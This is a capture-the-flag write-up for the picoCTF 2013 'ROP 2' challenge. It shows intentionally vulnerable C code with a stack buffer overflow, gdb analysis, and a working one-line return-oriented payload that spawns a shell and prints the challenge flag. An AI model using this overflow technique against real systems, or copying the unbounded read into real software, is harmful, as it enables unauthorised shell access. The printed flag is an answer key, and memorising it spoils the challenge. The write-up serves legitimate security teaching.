# PicoCTF 2k13 - ROP 2


$ cat rop2.c 
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Never referenced by the program.  It exists so that the string "/bin/bash"
 * and a pointer to it (in .data) are present in the binary; the exploit below
 * dumps that pointer's value with gdb (x/xw) and places it on the stack as the
 * argument for system(). */
char *not_used = "/bin/bash";

/* Never reached by normal control flow.  It exists so the binary contains a
 * `call` to system() (see the disassembly below: the exploit returns into that
 * `call` instruction rather than into system() itself).  Returns whatever
 * system() returns; the "/bin/date" command is only a decoy. */
int not_called() {
	const char *decoy_cmd = "/bin/date";
	int status = system(decoy_cmd);
	return status;
}

/* The intentional bug.  read() may deposit up to 256 bytes into a 128-byte
 * stack buffer with no bounds check (its return value is also ignored), so a
 * long enough input overwrites the saved frame pointer and return address.
 * The exploit below uses 140 bytes of filler before its fake return address;
 * that offset comes from the compiler's frame layout (alignment padding plus
 * saved ebp), not from sizeof buf alone, so it must be measured, not assumed.
 * Do not "fix" this -- it is the challenge. */
void vulnerable_function() {
 char buf[128];
 read(STDIN_FILENO, buf, 256);
}

/* Make the real, effective and saved gids all equal to the current effective
 * gid.  If the binary is setgid, a shell started via system() ("/bin/sh",
 * which is often bash) would otherwise notice real != effective and drop the
 * effective gid on startup, so the ROP chain's shell would lose the privilege
 * needed to read the key.  The return value of setresgid() is deliberately
 * left unchecked, as in the original challenge source. */
void be_nice_to_people() {
	gid_t effective = getegid();
	(void)setresgid(effective, effective, effective);
}

/* Entry point: equalise the gids, perform the overflowable read, then print a
 * greeting.  argc/argv are accepted for the conventional signature but are not
 * used.  Falling off the end of main() yields exit status 0 under C99+. */
int main(int argc, char **argv) {
	(void)argc;
	(void)argv;
	be_nice_to_people();
	vulnerable_function();
	/* 13 bytes == strlen("Hello, World\n"); write()'s return value is ignored. */
	static const char greeting[] = "Hello, World\n";
	write(STDOUT_FILENO, greeting, sizeof greeting - 1);
	return 0;
}
$ objdump -t ./rop2 | grep not_
080484a4 g     F .text 00000014              not_called
0804a024 g     O .data 00000004              not_used
$ gdb ./rop2
(gdb) set disassembly-flavor intel
(gdb) x/7i 0x080484a4
   0x80484a4 : push   ebp
   0x80484a5 : mov    ebp,esp
   0x80484a7 : sub    esp,0x18
   0x80484aa : mov    DWORD PTR [esp],0x804861a
   0x80484b1 : call   0x80483a0 
   0x80484b6 : leave  
   0x80484b7 : ret
(gdb) x/xw 0x0804a024
0x804a024 : 0x08048610
Payload: 140 bytes of filler to reach the saved return address, then 0x080484b1 (the `call 0x80483a0` inside not_called(), presumably system@plt) followed by 0x08048610 (the "/bin/bash" pointer read out of not_used). Returning into the `call` instead of into system() itself lets the `call` push its own return address, so the dword that follows on the stack is what system() sees as its argument -- no extra fake return address is needed. The trailing `cat` keeps stdin open so commands can be typed into the spawned shell; the one-liner is Python 2 syntax.
$ (python -c 'print "\x90"*140 + "\xb1\x84\x04\x08" + "\x10\x86\x04\x08"'; cat) | ./rop2
cat key
i_could_get_used_to_this_rop_thing
